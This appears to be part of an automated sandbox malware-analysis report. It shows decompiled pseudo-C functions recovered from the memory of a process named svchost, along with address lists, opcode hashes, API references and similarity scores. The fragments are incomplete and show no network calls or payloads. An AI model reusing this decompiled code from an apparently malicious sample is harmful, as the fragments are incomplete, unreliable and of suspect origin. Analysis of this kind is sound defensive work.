                                                                                                                                                                                                                                                                            0x04023fa2
                                                                                                                                                                                                                                                                            0x04023fa8
                                                                                                                                                                                                                                                                            0x04023fba
                                                                                                                                                                                                                                                                            0x04023fd2
                                                                                                                                                                                                                                                                            0x04023fe0
                                                                                                                                                                                                                                                                            0x04023fe6
                                                                                                                                                                                                                                                                            0x04023fed
                                                                                                                                                                                                                                                                            0x04023ffe
                                                                                                                                                                                                                                                                            0x04023fef
                                                                                                                                                                                                                                                                            0x04023ff9
                                                                                                                                                                                                                                                                            0x04023ff9
                                                                                                                                                                                                                                                                            0x0402400e
                                                                                                                                                                                                                                                                            0x0402400e
                                                                                                                                                                                                                                                                            0x04023fb7
                                                                                                                                                                                                                                                                            0x04023fb7
                                                                                                                                                                                                                                                                            0x04024017
                                                                                                                                                                                                                                                                            0x0402401e
                                                                                                                                                                                                                                                                            0x04024026
                                                                                                                                                                                                                                                                            0x0402402d
                                                                                                                                                                                                                                                                            0x04024038
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04024038
                                                                                                                                                                                                                                                                            0x0402401e
                                                                                                                                                                                                                                                                            0x04023fa2
                                                                                                                                                                                                                                                                            0x04024042

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: codecvt
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                            • Opcode ID: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                                                                                                            • Instruction ID: a3cb5fddb2616e01ffbd0549c63a57f7e4090b46a873f7d090d06a3cf8222b0d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5E18374A00328DFDB58CF94D998BADBBB2BF49308F244159D8096B391D776AD86CF40
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                                                                            			E04024820(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, signed int _a12) {
                                                                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr* _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                                                                            				intOrPtr _t114;
                                                                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                                                                            				void* _t121;
                                                                                                                                                                                                                                                                            				signed char _t124;
                                                                                                                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                                                            				void* _t198;
                                                                                                                                                                                                                                                                            				void* _t199;
                                                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                                                            				void* _t201;
                                                                                                                                                                                                                                                                            				void* _t203;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t199 = __esi;
                                                                                                                                                                                                                                                                            				_t198 = __edi;
                                                                                                                                                                                                                                                                            				_t146 = __ebx;
                                                                                                                                                                                                                                                                            				_v64 = __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				L1:
                                                                                                                                                                                                                                                                            				while(_a4 >= 0) {
                                                                                                                                                                                                                                                                            					_v28 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 4)) + 0x18));
                                                                                                                                                                                                                                                                            					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 4)) + 0x14));
                                                                                                                                                                                                                                                                            					if(_v28 != 0 && _v16 != 0) {
                                                                                                                                                                                                                                                                            						_v20 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _a4 * 4));
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_v20 + 0xc)) != 0) {
                                                                                                                                                                                                                                                                            							E040114D0( *_v64, _a4, 0, 1, _a12 & 0x000000ff);
                                                                                                                                                                                                                                                                            							_t114 = E04020CE0(8);
                                                                                                                                                                                                                                                                            							_t201 = _t200 + 4;
                                                                                                                                                                                                                                                                            							_v36 = _t114;
                                                                                                                                                                                                                                                                            							if(_v36 == 0) {
                                                                                                                                                                                                                                                                            								_v68 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v68 = E0401F4E0(_v36);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v12 = _v68;
                                                                                                                                                                                                                                                                            							E0401FC90(_t146, _v12, _t198, _t199,  *((intOrPtr*)(_v28 + 0x1c)), E040070A0( *((intOrPtr*)(_v28 + 0x1c))));
                                                                                                                                                                                                                                                                            							_t119 = E04020CE0(8);
                                                                                                                                                                                                                                                                            							_t203 = _t201 + 8;
                                                                                                                                                                                                                                                                            							_v40 = _t119;
                                                                                                                                                                                                                                                                            							if(_v40 == 0) {
                                                                                                                                                                                                                                                                            								_v72 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v72 = E0401F4E0(_v40);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v24 = _v72;
                                                                                                                                                                                                                                                                            							_t121 = E040070A0( *((intOrPtr*)(_v28 + 0x20)));
                                                                                                                                                                                                                                                                            							_t200 = _t203 + 4;
                                                                                                                                                                                                                                                                            							_t189 =  *((intOrPtr*)(_v28 + 0x20));
                                                                                                                                                                                                                                                                            							E0401FC90(_t146, _v24, _t198, _t199,  *((intOrPtr*)(_v28 + 0x20)), _t121);
                                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                                            								_t124 = E04015C60(_t146,  *_v64, _t189, _v12);
                                                                                                                                                                                                                                                                            								_t190 = _t124 & 0x000000ff;
                                                                                                                                                                                                                                                                            								if((_t124 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if((E04015C60(_t146,  *_v64, _t190, _v24) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            									E040114D0( *_v64, _a4, 0, 0, _a12 & 0x000000ff);
                                                                                                                                                                                                                                                                            									_v32 = E040246A0(_t146, _v64, _t198, _t199);
                                                                                                                                                                                                                                                                            									if(_v32 != 0) {
                                                                                                                                                                                                                                                                            										_t130 = E04020CE0(0x14);
                                                                                                                                                                                                                                                                            										_t200 = _t200 + 4;
                                                                                                                                                                                                                                                                            										_v44 = _t130;
                                                                                                                                                                                                                                                                            										if(_v44 == 0) {
                                                                                                                                                                                                                                                                            											_v76 = 0;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											_v76 = E04006060(_v44);
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_v8 = _v76;
                                                                                                                                                                                                                                                                            										 *_v8 = E040242C0(_t146, _v64, _t198, _t199, _v12);
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_v8 + 4)) = E040243F0(_t146, _v64, _t198, _t199, _v12);
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_v8 + 8)) = E04024180(_t146, _v64, _t198, _t199, _v24);
                                                                                                                                                                                                                                                                            										_t195 = _a12 & 0x000000ff;
                                                                                                                                                                                                                                                                            										if((_a12 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            											_t79 = _v20 + 0xc; // 0xc7077400
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v8 + 0xc)) = E040240B0(_t146, _v64, _t195, _t198, _t199,  *_t79);
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_v8 + 0x10)) = _v32;
                                                                                                                                                                                                                                                                            										_t189 = 0;
                                                                                                                                                                                                                                                                            										if(0 != 0) {
                                                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                                                            								if(_v12 != 0) {
                                                                                                                                                                                                                                                                            									_v52 = _v12;
                                                                                                                                                                                                                                                                            									_v48 = _v52;
                                                                                                                                                                                                                                                                            									if(_v48 == 0) {
                                                                                                                                                                                                                                                                            										_v80 = 0;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_v80 = E04004EA0(_v48, 1);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v12 = 0x666;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_v24 != 0) {
                                                                                                                                                                                                                                                                            									_v60 = _v24;
                                                                                                                                                                                                                                                                            									_v56 = _v60;
                                                                                                                                                                                                                                                                            									if(_v56 == 0) {
                                                                                                                                                                                                                                                                            										_v84 = 0;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										_v84 = E04004EA0(_v56, 1);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v24 = 0x666;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(0 != 0) {
                                                                                                                                                                                                                                                                            									goto L1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								goto L38;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L38;
                                                                                                                                                                                                                                                                            			}


































                                                                                                                                                                                                                                                                            0x04024820
                                                                                                                                                                                                                                                                            0x04024820
                                                                                                                                                                                                                                                                            0x04024820
                                                                                                                                                                                                                                                                            0x04024826
                                                                                                                                                                                                                                                                            0x04024829
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04024830
                                                                                                                                                                                                                                                                            0x04024844
                                                                                                                                                                                                                                                                            0x04024850
                                                                                                                                                                                                                                                                            0x04024857
                                                                                                                                                                                                                                                                            0x04024870
                                                                                                                                                                                                                                                                            0x0402487a
                                                                                                                                                                                                                                                                            0x04024893
                                                                                                                                                                                                                                                                            0x0402489a
                                                                                                                                                                                                                                                                            0x0402489f
                                                                                                                                                                                                                                                                            0x040248a2
                                                                                                                                                                                                                                                                            0x040248a9
                                                                                                                                                                                                                                                                            0x040248b8
                                                                                                                                                                                                                                                                            0x040248ab
                                                                                                                                                                                                                                                                            0x040248b3
                                                                                                                                                                                                                                                                            0x040248b3
                                                                                                                                                                                                                                                                            0x040248c2
                                                                                                                                                                                                                                                                            0x040248df
                                                                                                                                                                                                                                                                            0x040248e6
                                                                                                                                                                                                                                                                            0x040248eb
                                                                                                                                                                                                                                                                            0x040248ee
                                                                                                                                                                                                                                                                            0x040248f5
                                                                                                                                                                                                                                                                            0x04024904
                                                                                                                                                                                                                                                                            0x040248f7
                                                                                                                                                                                                                                                                            0x040248ff
                                                                                                                                                                                                                                                                            0x040248ff
                                                                                                                                                                                                                                                                            0x0402490e
                                                                                                                                                                                                                                                                            0x04024918
                                                                                                                                                                                                                                                                            0x0402491d
                                                                                                                                                                                                                                                                            0x04024924
                                                                                                                                                                                                                                                                            0x0402492b
                                                                                                                                                                                                                                                                            0x04024930
                                                                                                                                                                                                                                                                            0x04024939
                                                                                                                                                                                                                                                                            0x0402493e
                                                                                                                                                                                                                                                                            0x04024943
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0402495d
                                                                                                                                                                                                                                                                            0x04024976
                                                                                                                                                                                                                                                                            0x04024983
                                                                                                                                                                                                                                                                            0x0402498a
                                                                                                                                                                                                                                                                            0x04024993
                                                                                                                                                                                                                                                                            0x04024998
                                                                                                                                                                                                                                                                            0x0402499b
                                                                                                                                                                                                                                                                            0x040249a2
                                                                                                                                                                                                                                                                            0x040249b1
                                                                                                                                                                                                                                                                            0x040249a4
                                                                                                                                                                                                                                                                            0x040249ac
                                                                                                                                                                                                                                                                            0x040249ac
                                                                                                                                                                                                                                                                            0x040249bb
                                                                                                                                                                                                                                                                            0x040249cd
                                                                                                                                                                                                                                                                            0x040249de
                                                                                                                                                                                                                                                                            0x040249f0
                                                                                                                                                                                                                                                                            0x040249f3
                                                                                                                                                                                                                                                                            0x040249f9
                                                                                                                                                                                                                                                                            0x040249fe
                                                                                                                                                                                                                                                                            0x04024a0d
                                                                                                                                                                                                                                                                            0x04024a0d
                                                                                                                                                                                                                                                                            0x04024a16
                                                                                                                                                                                                                                                                            0x04024a19
                                                                                                                                                                                                                                                                            0x04024a1b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0402498c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0402495f
                                                                                                                                                                                                                                                                            0x04024a21
                                                                                                                                                                                                                                                                            0x04024a25
                                                                                                                                                                                                                                                                            0x04024a2a
                                                                                                                                                                                                                                                                            0x04024a30
                                                                                                                                                                                                                                                                            0x04024a37
                                                                                                                                                                                                                                                                            0x04024a48
                                                                                                                                                                                                                                                                            0x04024a39
                                                                                                                                                                                                                                                                            0x04024a43
                                                                                                                                                                                                                                                                            0x04024a43
                                                                                                                                                                                                                                                                            0x04024a4f
                                                                                                                                                                                                                                                                            0x04024a4f
                                                                                                                                                                                                                                                                            0x04024a5a
                                                                                                                                                                                                                                                                            0x04024a5f
                                                                                                                                                                                                                                                                            0x04024a65
                                                                                                                                                                                                                                                                            0x04024a6c
                                                                                                                                                                                                                                                                            0x04024a7d
                                                                                                                                                                                                                                                                            0x04024a6e
                                                                                                                                                                                                                                                                            0x04024a78
                                                                                                                                                                                                                                                                            0x04024a78
                                                                                                                                                                                                                                                                            0x04024a84
                                                                                                                                                                                                                                                                            0x04024a84
                                                                                                                                                                                                                                                                            0x04024a8d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04024a8d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0402487c
                                                                                                                                                                                                                                                                            0x0402487a
                                                                                                                                                                                                                                                                            0x04024a93
                                                                                                                                                                                                                                                                            0x04024a99
                                                                                                                                                                                                                                                                            0x04024a99
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                                                                                                            • Instruction ID: a5d7251e2747225a00ddcb09f2389310aff70beb4688250c6b3f934d2e6ae519
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0491C6B4E00229EFDB08DF94D594BAEBBB1BF88308F148059E9157B390DB75A941CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 04021A91
                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 04021AB5
                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 04021B49
                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 04021B62
                                                                                                                                                                                                                                                                              • Part of subcall function 040217B0: _memset.LIBCMT ref: 040217EA
                                                                                                                                                                                                                                                                              • Part of subcall function 040217B0: _memset.LIBCMT ref: 04021800
                                                                                                                                                                                                                                                                              • Part of subcall function 040217B0: _memset.LIBCMT ref: 0402181A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                            • API String ID: 2102423945-2766056989
                                                                                                                                                                                                                                                                            • Opcode ID: e94b19ba0fcb669e4e0cbc5759ced8619370a39b6899ccf5e07f60b5a10fbc88
                                                                                                                                                                                                                                                                            • Instruction ID: 01bcd26e004969603b563e094358f1b64e43344fbc446aa7b287e43a94b7a553
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e94b19ba0fcb669e4e0cbc5759ced8619370a39b6899ccf5e07f60b5a10fbc88
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B715EB4E002089BEB10DB94DD45BEDB7B5BF48308F5041A8E609BB2C1D6766E55CF68
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                                                                            			E04013410(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				void _v60;
                                                                                                                                                                                                                                                                            				void _v96;
                                                                                                                                                                                                                                                                            				void* _v100;
                                                                                                                                                                                                                                                                            				intOrPtr _v104;
                                                                                                                                                                                                                                                                            				intOrPtr _v108;
                                                                                                                                                                                                                                                                            				intOrPtr _v112;
                                                                                                                                                                                                                                                                            				void* _v116;
                                                                                                                                                                                                                                                                            				intOrPtr _v120;
                                                                                                                                                                                                                                                                            				void* _v124;
                                                                                                                                                                                                                                                                            				intOrPtr* _v128;
                                                                                                                                                                                                                                                                            				intOrPtr _v132;
                                                                                                                                                                                                                                                                            				void* _v136;
                                                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				intOrPtr _t87;
                                                                                                                                                                                                                                                                            				intOrPtr _t95;
                                                                                                                                                                                                                                                                            				void* _t98;
                                                                                                                                                                                                                                                                            				signed int _t142;
                                                                                                                                                                                                                                                                            				void* _t143;
                                                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t98 = __ebx;
                                                                                                                                                                                                                                                                            				_v12 =  *0x429024 ^ _t142;
                                                                                                                                                                                                                                                                            				_v128 = __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				while(_a4 != 0) {
                                                                                                                                                                                                                                                                            					memcpy( &_v60, 0x426ef4, 0xb << 2);
                                                                                                                                                                                                                                                                            					asm("movsb");
                                                                                                                                                                                                                                                                            					memcpy( &_v96, 0x426f24, 8 << 2);
                                                                                                                                                                                                                                                                            					_t145 = _t143 + 0x18;
                                                                                                                                                                                                                                                                            					asm("movsb");
                                                                                                                                                                                                                                                                            					if( *(_a4 + 0x24) >= 0) {
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)( *_v128 + 0x2c)) >  *(_a4 + 0x24)) {
                                                                                                                                                                                                                                                                            							_v108 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v128 + 0x28)) +  *(_a4 + 0x24) * 4)) + 0xc)));
                                                                                                                                                                                                                                                                            							_v104 = _v108 + 0x1e;
                                                                                                                                                                                                                                                                            							_v116 = E04020CE0(_v104 + 1);
                                                                                                                                                                                                                                                                            							_v100 = _v116;
                                                                                                                                                                                                                                                                            							E04007010(0x426f34, _v100, 0, _v104 + 1);
                                                                                                                                                                                                                                                                            							 *0x4251f8(_v100, _v104 + 1,  &_v96,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v128 + 0x28)) +  *(_a4 + 0x24) * 4)) + 0xc)));
                                                                                                                                                                                                                                                                            							_t87 = E04020CE0(8);
                                                                                                                                                                                                                                                                            							_t143 = _t145 + 0x28;
                                                                                                                                                                                                                                                                            							_v120 = _t87;
                                                                                                                                                                                                                                                                            							if(_v120 == 0) {
                                                                                                                                                                                                                                                                            								_v136 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v136 = E0401F4E0(_v120);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t133 = _v136;
                                                                                                                                                                                                                                                                            							_v8 = _v136;
                                                                                                                                                                                                                                                                            							E0401FC90(_t98, _v8, 0x426f34, 0x426f24, _v100, _v104);
                                                                                                                                                                                                                                                                            							if(_v100 != 0) {
                                                                                                                                                                                                                                                                            								_t133 = _v100;
                                                                                                                                                                                                                                                                            								_v124 = _v100;
                                                                                                                                                                                                                                                                            								E04020CC0(_v124);
                                                                                                                                                                                                                                                                            								_t143 = _t143 + 4;
                                                                                                                                                                                                                                                                            								_v100 = 0x666;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                                                                            							if(0 != 0) {
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							L16:
                                                                                                                                                                                                                                                                            							return E04006C8C(_v8, _t98, _v12 ^ _t142, _t133, 0x426f34, 0x426f24);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t95 = E04020CE0(8);
                                                                                                                                                                                                                                                                            					_t143 = _t145 + 4;
                                                                                                                                                                                                                                                                            					_v112 = _t95;
                                                                                                                                                                                                                                                                            					if(_v112 == 0) {
                                                                                                                                                                                                                                                                            						_v132 = 0;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_v132 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v8 = _v132;
                                                                                                                                                                                                                                                                            					_t133 =  &_v60;
                                                                                                                                                                                                                                                                            					E0401FC90(_t98, _v8, 0x426f34, 0x426f24,  &_v60, 0x2c);
                                                                                                                                                                                                                                                                            					goto L15;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L16;
                                                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                                                            0x04013410
                                                                                                                                                                                                                                                                            0x04013420
                                                                                                                                                                                                                                                                            0x04013425
                                                                                                                                                                                                                                                                            0x04013428
                                                                                                                                                                                                                                                                            0x0401342f
                                                                                                                                                                                                                                                                            0x04013447
                                                                                                                                                                                                                                                                            0x04013449
                                                                                                                                                                                                                                                                            0x04013457
                                                                                                                                                                                                                                                                            0x04013457
                                                                                                                                                                                                                                                                            0x04013459
                                                                                                                                                                                                                                                                            0x04013461
                                                                                                                                                                                                                                                                            0x040134b1
                                                                                                                                                                                                                                                                            0x040134d5
                                                                                                                                                                                                                                                                            0x040134de
                                                                                                                                                                                                                                                                            0x040134f0
                                                                                                                                                                                                                                                                            0x040134f6
                                                                                                                                                                                                                                                                            0x04013506
                                                                                                                                                                                                                                                                            0x04013532
                                                                                                                                                                                                                                                                            0x0401353d
                                                                                                                                                                                                                                                                            0x04013542
                                                                                                                                                                                                                                                                            0x04013545
                                                                                                                                                                                                                                                                            0x0401354c
                                                                                                                                                                                                                                                                            0x0401355e
                                                                                                                                                                                                                                                                            0x0401354e
                                                                                                                                                                                                                                                                            0x04013556
                                                                                                                                                                                                                                                                            0x04013556
                                                                                                                                                                                                                                                                            0x04013568
                                                                                                                                                                                                                                                                            0x0401356e
                                                                                                                                                                                                                                                                            0x0401357c
                                                                                                                                                                                                                                                                            0x04013585
                                                                                                                                                                                                                                                                            0x04013587
                                                                                                                                                                                                                                                                            0x0401358a
                                                                                                                                                                                                                                                                            0x04013591
                                                                                                                                                                                                                                                                            0x04013596
                                                                                                                                                                                                                                                                            0x04013599
                                                                                                                                                                                                                                                                            0x04013599
                                                                                                                                                                                                                                                                            0x040135a0
                                                                                                                                                                                                                                                                            0x040135a2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040135a8
                                                                                                                                                                                                                                                                            0x040135ba
                                                                                                                                                                                                                                                                            0x040135ba
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040134b3
                                                                                                                                                                                                                                                                            0x04013465
                                                                                                                                                                                                                                                                            0x0401346a
                                                                                                                                                                                                                                                                            0x0401346d
                                                                                                                                                                                                                                                                            0x04013474
                                                                                                                                                                                                                                                                            0x04013483
                                                                                                                                                                                                                                                                            0x04013476
                                                                                                                                                                                                                                                                            0x0401347e
                                                                                                                                                                                                                                                                            0x0401347e
                                                                                                                                                                                                                                                                            0x0401348d
                                                                                                                                                                                                                                                                            0x04013492
                                                                                                                                                                                                                                                                            0x04013499
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04013499
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013479
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Iterator_baseIterator_base::_std::_
                                                                                                                                                                                                                                                                            • String ID: $oB
                                                                                                                                                                                                                                                                            • API String ID: 370429920-3132252410
                                                                                                                                                                                                                                                                            • Opcode ID: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                                                                                                            • Instruction ID: ff111addb76ca9d35d31a8907435c4d95596588a54556616c049ff3552255213
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5651FDB5E00218DFEB14DF98D984A9DB7B5FF48308F508169D9096B351D771B944CF81
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 50%
